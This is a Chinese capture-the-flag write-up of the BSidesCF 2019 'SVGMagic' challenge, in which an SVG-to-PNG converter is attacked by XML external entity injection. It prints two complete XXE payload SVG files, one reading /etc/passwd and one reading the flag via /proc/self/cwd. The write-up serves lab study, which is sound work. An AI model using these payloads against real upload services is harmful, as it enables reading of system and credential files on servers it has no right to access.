[BSidesCF 2019]SVGMagic

打开题目

给了提示,使用魔法将svg转换成png,搜索了一下svg

是一种XML标记语言,既然是XML,就可能存在XXE漏洞

构造一个XML外部实体注入(XXE)攻击,尝试一下

<!ENTITY file SYSTEM "file:///etc/passwd" > 定义一个外部实体 file任意文件读取,读取/etc/passwd用户配置文件

在SVG部分中,&file; 通过文本引用该实体,试图将文件的内容嵌入到SVG输出中。

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///etc/passwd" >

]>

<svg height="300" width="300">

<text x="30" y="30">&file;</text>

</svg>

上传发现可以正常读取

然后构造读取flag

/proc 文件系统:它是一个虚拟文件系统,提供了运行时系统信息,如进程信息、内存状态、系统配置等。

/proc/self:它是指当前正在访问该路径的进程自身。无论哪个进程访问 /proc/self,它总是指向调用者进程的 /proc/[pid] 目录。

cwd:代表"current working directory"(当前工作目录)。当你访问 /proc/self/cwd/ 时,你实际上是在查看当前进程的工作目录。

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE note [

<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >

]>

<svg height="300" width="3000">

<text x="30" y="30">&file;</text>

</svg>

上传得到flag

相关推荐
0xSec笔记本挖呀瓦呀挖5 小时前
Windows后门应急(二)--计划任务后门分析与处置|Windows取证分析
windows·安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析
乾元12 小时前
加密流量: 不解密情况下通过流特征识别恶意载荷
网络·人工智能·安全·web安全·机器学习·架构·安全架构
实时数据13 小时前
渗透测试通过模拟真实黑客的攻击行为,帮助识别系统、网络或应用程序中的潜在漏洞
网络·安全·web安全
瘾大侠15 小时前
HTB 赛季10 - Pterodactyl - user
网络·安全·web安全·网络安全
Ancelin安心1 天前
FastJson反序列化和Shiro漏洞
java·运维·开发语言·安全·web安全·json·idea
少云清2 天前
【安全测试】3_网络安全测试 _数据加密和数据签名
安全·web安全
独行soc2 天前
2026年渗透测试面试题总结-23(题目+回答)
网络·python·安全·web安全·渗透测试·安全狮
Jerry_Gao9212 天前
【CTF】一道非常精彩的CTF题目之 SSRF + CRLF + Python反序列化组合漏洞利用
python·web安全·网络安全·ctf·ssrf·crlf
网安老伯2 天前
2026 网络安全就业:普通人抓住年薪百万入场券的实操指南
运维·python·学习·web安全·网络安全·职场和发展·php
白帽子凯哥哥2 天前
2026“星城白帽”冬令营:三天实战淬炼,守护数字未来!
web安全·网络安全·渗透测试·湖南省网安基地·冬令营